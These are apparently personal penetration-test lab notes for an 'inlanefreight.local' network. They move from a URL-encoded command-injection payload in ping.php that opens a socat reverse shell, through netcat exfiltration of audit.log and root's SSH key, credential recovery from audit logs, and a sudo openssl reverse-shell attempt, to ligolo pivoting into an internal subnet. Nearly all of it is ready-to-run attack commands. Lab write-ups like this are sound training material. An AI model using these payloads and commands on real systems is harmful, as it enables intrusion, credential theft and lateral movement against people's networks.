# Shell as `webdev`
- payload
```bash
curl http://monitoring.inlanefreight.local/ping.php?ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:bash
```
- stabilize shell
- we have a hit ![[images/Pasted image 20260630222557.png]]
- stabilize shell
- we can read logs in `/var/log` because we are in the `adm` group
- move `audit.log` to Kali
```bash
which nc #check for nc on target
nc -lnvp 9002 -q 3 > loot/audit.log #setup listener on kali
nc -q 3 -nv 10.10.15.114 9002 < audit.log #push audit.log to Kali
```
- now we need a tool to parse `audit.log` ![[images/Pasted image 20260701172600.png]]
- try `audit-pretty` first, then `aushape`
- got both working and `grep` on `srvadm` and `webdev`
- i see `/usr/bin/su` being called but no creds
- try `aureport`
- install `auditd`
- we could have also done this on target
- this leaks creds for `srvadm`
```bash
sudo cat audit.log | aureport --tty | grep -B5 srvadm
```
# Shell as `srvadm`
- `su` to `srvadm`
- `flag.txt` in home dir
- not much else
- DMZ01 is dual-homed ![[images/Pasted image 20260701200741.png]]
- we can run `openssl` as root ![[images/Pasted image 20260701175658.png]]
- try below from GTFObins
```bash
mkfifo /tmp/f
sudo /bin/sh -i </tmp/f 2>&1 | sudo openssl s_client -quiet -connect 10.10.15.114:9002 >/tmp/f
```
- that did not work; instead, read `id_rsa`
```bash
sudo openssl enc -in /root/.ssh/id_rsa > id_rsa
```
![[images/Pasted image 20260701192428.png]]
- move back to kali with above `nc` trick ![[images/Pasted image 20260701195304.png]]
# Shell as `root`
## light enum
- networking check ![[images/Pasted image 20260701195343.png]]
- interface 4 (172.18.0.0/16) is a custom docker bridge network and interface 5 (172.17.0.0/16) is the default docker network
- `.bash_history` ![[images/Pasted image 20260701195717.png]]
- docker containers: `docker ps -a` ![[images/Pasted image 20260701195747.png]]
- login shells
## host discovery
- 172.16.8.0/16 subnet
```bash
for i in {1..254} ;do (ping -c 1 172.16.8.$i | grep "bytes from" &) ;done
```
![[images/Pasted image 20260701201424.png]]
## setup pivot
- steps on Kali
```bash
sudo ip tuntap add user $(whoami) mode tun ligolo && sudo ip link set ligolo up
sudo ip route add 172.16.8.0/24 dev ligolo; ip route | grep ligolo
sudo ./proxy -laddr 0.0.0.0:11601 -selfcert
scp -i ../loot/dmz01.id_rsa agent
[email protected]:/root #move ligolo agent to DMZ01
```
- steps on DMZ01
```bash
./agent -connect 10.10.15.114:11601 -ignore-cert
```
- steps in ligolo
```bash
ligolo > session #select session 1
ligolo > start --tun ligolo
```
- confirm interface and routes ![[images/Pasted image 20260701202408.png]]
- confirm with ping ![[images/Pasted image 20260701202428.png]]